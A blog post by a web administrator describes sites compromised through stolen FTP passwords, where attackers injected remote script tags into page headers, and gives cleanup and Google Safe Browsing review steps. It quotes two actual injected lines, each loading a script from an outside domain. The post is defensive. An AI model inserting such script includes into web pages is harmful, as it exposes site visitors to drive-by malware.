This is something very common and normal, I get a call about this every couple months:

“Hey Ed, the files in my server have been edited and now my website is loading some weird JavaScript from sites I do not know”
OR
“Hey Ed, Google blocked my site!!! and I am getting a Reported Attack Site page.”

Reported Attack Site!

This web site at website.com has been reported as an attack site and has been blocked based on your security preferences.

Attack sites try to install programs that steal private information, use your computer to attack others, or damage your system.

Some attack sites intentionally distribute harmful software, but many are compromised without the knowledge or permission of their owners.

Reported Attack Site

The problem:
You either were hacked or someone who logs into the account/server using FTP has a virus in his/her computer, you are lucky it’s a simple JS include they did there, trust me, I have seen things you do not even imagine.

If you are luckier there is only one website infected, if not, the whole server is fucked up and all the accounts’ files are edited and in the worst case-scenario the code on the files is a mess.

Last time this happened the problem was a virus in a designer’s computer, he had no antivirus and the 4 sites he had access to were the only ones infected, that happened the very same day he got the passwords for the FTP.

What we found:
All the files in the server/account that have “</header> <body>” tags were infected.

For example:
The file ../index.html we opened it and checked the HTML code, we noticed a problem right away, it does not say

</header><body>

instead it says
</head><script src=http://vanbeurden-porsche.be/library/index.php ></script><body>
OR
</head>
<script src=http://bigcjewelryandloan.com/library/index.php ></script><body>

Or something similar…

Solution:
The damage is done, get an antivirus and then change your FTP passwords.
Remove that JavaScript code in the head of your pages, replace the files if you have a backup or contact me and I will do it.


After the files are looking good you will probably want to run a scan using Google to make sure your site is clean after you finish removing the code using this link
http://www.google.com/safebrowsing/diagnostic?site=http://www.YOURsite.com/&hl=en
Look at mine:
http://www.google.com/safebrowsing/diagnostic?site=http://www.eduardobaret.com/&hl=en
After that you might want to ask Google to verify your site is ok, you will need to use The Webmaster’s Tools from Google and if your site is not OK you will get something like this.


From google reports:


Status of the last badware appeal for this site: A review for this site has finished. The site was found to still be dangerous for users. Please review your site again. When you are confident that you have cleaned and secured your site, please request another review.

Google users will see a warning page when they attempt to visit pages within this site. You can visit the Google Safe Browsing diagnostic page for your site for detailed information about the problems we found. Sample pages that may be distributing malware:…………………



If you are having a similar problem and need some help let me know.

Post a comment.